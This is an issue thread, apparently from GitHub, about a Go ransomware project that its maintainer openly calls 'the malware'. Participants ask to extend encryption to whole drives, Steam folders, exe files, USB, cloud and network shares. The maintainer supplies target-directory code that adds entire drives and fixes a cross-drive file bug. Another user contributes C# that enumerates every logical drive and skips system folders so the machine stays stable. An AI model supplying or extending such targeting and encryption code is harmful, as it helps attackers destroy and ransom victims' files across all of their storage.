Scan Sub directories and Drives.

[justuandme]

1- sub directories like in current user + pictures + any Sub directory of pictures. i tried with single sub directory by providing path: UserDir + "Pictures\\images", it do encrypt the images folder but on decryption the images which are placed on Pictures\\images folder are not readable.

2- Also search and encrypt/decrypt files extensions in other available drives.

[mauri870]

1 - I will investigate this behavior

2- The unlocker is compiled with the malware so both share the same cmd variables, including the InterestingDirs, so an unlocker will be useful only with the respective encrypter

[justuandme]

This is a request for feature that can also search directories and files in other drives like E, F, Z etc. and encrypt it. rather than providing the full path of the folders, can it be use to search the files extensions in Other windows drives? 2- Also search and encrypt/decrypt files extensions in other available drives.

[mauri870]

I don't test it but I think you can specify custom drivers directly on the InterestingDirs variable. Internally I use filepath.Walk to match files on dirs and subdirs

[justuandme]

when EDrive = fmt.Sprintf("E:\\newfolder") This will do the job in E drive newfolder only.. but i want it to do job in whole E:\ drive without providing any folder name. if i do like EDrive = fmt.Sprintf("E:\\") it doesn't work. is there is anyway to do job in whole drive without providing folder names ?

[mauri870]

From the filepath.Walk documentation

func Walk(root string, walkFn WalkFunc) error
Walk walks the file tree rooted at root, calling walkFn for each file or directory in the tree, including root. All errors that arise visiting files and directories are filtered by walkFn. The files are walked in lexical order, which makes the output deterministic but means that for very large directories Walk can be inefficient. Walk does not follow symbolic links.

It's supposed to work :confused:

[mauri870]

@justuandme Try this:

// Directories to walk searching for files
InterestingDirs = []string{
    UserDir + "Pictures",
    UserDir + "Documents",
    UserDir + "Music",
    UserDir + "Desktop",
    UserDir + "Downloads",
    UserDir + "Videos",
    "E:\\",
}

[justuandme]

Great This work now! :dancing_men:

[justuandme]

now its not working on same VM after i revert and ran the same ransom binary. it shows this error.

2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk
drive.

but the files are there at there paths.

[mauri870]

This error is supposed to be thrown on unix systems only :confused: But I think this is related here

I will fix this as soon as possible

Thanks for your reports

[ghost]

Hello,

Please check this : Loop through files and folders recursively

https://gist.github.com/francoishill/a5aca2a7bd598ef5b563

and get it combined with something like : C#

foreach (string drive in Directory.GetLogicalDrives())

{

//call to Loop through files and folders recursively , and add found files to List ( list can be filtered for specific extensions like the code below.

}

also, i think is better to add a filter with black listed directories which we do not need like windows, program files, recovery ... etc

in C# i do it like this :

        static List<string> blacklist = new List<string>()
            {
                 "$Recycle.Bin", "Documents and Settings", "Program Files", "Program Files (x86)", "ProgramData", "Recovery"
            };

................

IEnumerator<DirectoryInfo> dirs;
            try
            {
                dirs = top_directory.EnumerateDirectories("*").Where(d =>
                !d.Name.Contains(blacklist[0]) &&
                !d.Name.Contains(blacklist[1]) &&
                !d.Name.Contains(blacklist[2]) &&
                !d.Name.Contains(blacklist[3]) &&
                !d.Name.Contains(blacklist[4]) &&
                !d.Name.Contains(blacklist[5])).GetEnumerator();
            }

I'm more into C#, hope this helps

[justuandme]

Hello, im not good in GoLang nor C#...lets mauri finds it. but i think we dont need to restrict or define folder names in C drive instead mauri already provided some C drive paths where to encrypt. btw i think we don't restrict some programs in "Program Files" encrypt some steam games too xD

SteamEncrypt = fmt.Sprintf("C:\\$ProgramFilesDir")

// Directories to walk searching for files
    InterestingDirs = []string{
        UserDir + "Pictures",
        UserDir + "Documents",
        UserDir + "Music",
        UserDir + "Desktop",
        UserDir + "Downloads",
        UserDir + "Videos",
        SteamEncrypt + "\\Steam\\steamapps\\common",
    }

Add exe in extentions

    // Interesting extensions to match files
    InterestingExtensions = []string{
        // Text Files
        "doc", "docx", "msg", "odt", "wpd", "wps", "txt",
        ...........................................
        // SteamEncrypt & UserProfile Paths any exe encrypt.
        "exe"
}

Moreover you can encrypt all files stored on Usb Drives/sticks, Externals Disks, Internal Disks, Onedrive, Dropbox, Google Drive, Network drives, Network Shares.

[ghost]

@justuandme steam games and saves are not saved as .exe in the programs folder, encrypting the game.exe or steam.exe is useless.

the C# code i wrote above scans all drives not only the C, also it is a bad idea to use hard-coded value C as you mentioned above "SteamEncrypt" , what if the OS is not installed in C drive ? 😉

[justuandme]

@Hanoosh the hard-coded value is just an example that is not the correct code, if you see my previous post above. i have asked for something like which start loop and scan all the drives.. A-Z and then start encrypting.

whatever the extension steam games uses we can add that extension. i m making list of huge amount of extensions, will check what steam games extensions are and will post it here soon.

[mauri870]

Hi guys, sorry for the delay

About this error:

2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk
drive.

The temporary file is created on AppData\Local\Temp on the System drive (C in most cases). For performance reasons I use the os.Rename to copy the temp file to the original file but on windows we cannot rename a file across drives :disappointed:

I think I'll have to open the two files and copy them via stream (io.Copy)

[mauri870]

@justuandme Feel free to fork and add more extensions to match ;)

[justuandme]

@mauri870 any changes so far ? did you check with all drives ?

[mauri870]

Hi @justuandme. This error:

2016/10/14 11:04:31 rename C:\Users\Test\AppData\Local\Temp\263942.jpg E:\fdasdfsafaffasgjsjd\263942.jpg: The system cannot move the file to a different disk
drive.

is fixed here

About scan drives, it's not implemented yet because are multiple folder that we need ignore otherwise will cause system instability and crashes.

For now you can specify drives manually

[justuandme]

i specified drive letter manually... i specified all letters from A-Z but it crashes on scanning the valid one. is there is any way to find the total number of drives ? and scan those for files..?

[mauri870]

@justuandme You can use this examples

[justuandme]

@mauri870 i have used this example before, but didn't work for me. im not GoPro :( can u merge it or show me how to implement it.

[mauri870]

Hi @justuandme , sorry for the delay. I will add options for exclude dirs in the future.

About identify the available drives, it's more complicated because we need load the kernel32.dll, this will add more stuff to the project rather than the actual simple string slice. I will think more about this

[mauri870]

I'll close this issue since now we can loop all available drives by default